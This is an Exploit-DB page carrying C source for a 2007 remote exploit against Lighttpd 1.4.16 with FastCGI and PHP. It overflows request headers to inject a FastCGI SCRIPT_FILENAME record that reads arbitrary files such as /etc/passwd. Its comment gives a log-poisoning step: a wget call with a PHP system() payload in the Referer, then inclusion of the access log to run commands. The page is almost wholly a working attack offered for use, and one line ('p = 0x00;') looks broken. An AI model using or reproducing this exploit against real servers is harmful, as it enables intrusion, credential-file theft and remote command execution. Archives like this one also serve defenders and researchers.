Lighttpd 1.4.16 - FastCGI Header Overflow Remote Command Execution

EDB-ID:

4391

CVE:

N/A

EDB Verified:

Author:

Mattias Bengtsson

Type:

remote

Exploit:   /  

Platform:

Multiple

Date:

2007-09-10

Vulnerable App: 
/*
 * Remote Lighttpd + FastCGI + PHP example exploit
 *
 * Tested with Lighttpd 1.4.16 and PHP 5.2.4
 *
 * To avoid abuse there's a "remove me" in the code.
 *
 * Example:
 *
 * # ./exploit localhost 80 /etc/passwd
 *
 * or
 *
 * # wget --referer="<?php system('/usr/bin/id'); ?>" localhost
 * # ./exploit localhost 80 /var/log/lighttpd/access.log 
 *
 * 
 * Mattias Bengtsson <mattias@secweb.se>
 *
 * http://www.secweb.se/
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#include <sys/types.h>
#include <sys/socket.h>

#include <netdb.h>
#include <arpa/inet.h>
#include <netinet/in.h>

int append_header(char *p, int c, int a, int b)
{
	c = 0x41 + (c % 25);

	memset(p, c, a + b + 4);

	p[a + 0 + 0] = ':';
	p[a + 0 + 1] = ' ';
	p[a + b + 2] = '\r';
	p[a + b + 3] = '\n';

	return a + b + 4; 
}

int network(const char *host, int port)
{
	struct sockaddr_in addr;
	struct hostent *he;
	int sock;

	sock = socket(AF_INET, SOCK_STREAM, 0);

	addr.sin_family = AF_INET;

	if((he = gethostbyname(host)) == NULL)
		return 0;

	memcpy(&addr.sin_addr, he->h_addr_list[0], he->h_length);

	addr.sin_port = htons(port);

	connect(sock, (struct sockaddr *)&addr, sizeof(addr));

	return sock;
}

int main(int argc, char **argv)
{
	char *b, *p;
	int sock, i;
	char tmp[1024];

	if(argc < 4) {
		fprintf(stderr, "Usage: %s <host> <port> <file>\n", argv[0]);
		exit(0);
	}

	sock = network(argv[1], atoi(argv[2]));

	if(sock <= 0) {
		fprintf(stderr, "Host down?\n");
		exit(0);
	}
	
	b = p = malloc(0xffff + 0xffff);

	p += sprintf(p, "GET /index.php HTTP/1.1\r\n");
	p += sprintf(p, "Host: %s\r\n", argv[1]);
	p += sprintf(p, "A: A\r\nB: ");

	*p++ = 128;
	*p++ = 0x00;
	*p++ = 0x54;
	*p++ = 0x42;
	*p++ = '\r';
	*p++ = '\n';
	p = 0x00;
	
	p += append_header(p, 0, 4, 1);
	p += append_header(p, 1, 200 , 25079);

	p -= 3631;

	*p++ = 1; // Version
	*p++ = 4; // Type
	*p++ = 0;
	*p++ = 0;

	i = sprintf(tmp, "SCRIPT_FILENAME");
	sprintf(tmp + i, "%s", argv[3]);

	*p++ = 0x00; // Length 
	*p++ = 2 + strlen(tmp); // Length
	*p++ = 0x00; // Padding
	*p++ = 0x10;
	*p++ = i; // name_len
	*p++ = strlen(tmp) - i; // var_len

	memcpy(p, tmp, strlen(tmp));

	p += 3631 - 8 - 2;

	p += append_header(p, 2, 200, 40007);
	p += sprintf(p, "\r\n\r\n");

	write(sock, b, (p - b));

	i = read(sock, b, 0xffff);
	*(b + i) = 0;
	
	printf("%s\n", b);

	free(b);
	close(sock);

	return 0;
}

// milw0rm.com [2007-09-10]
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services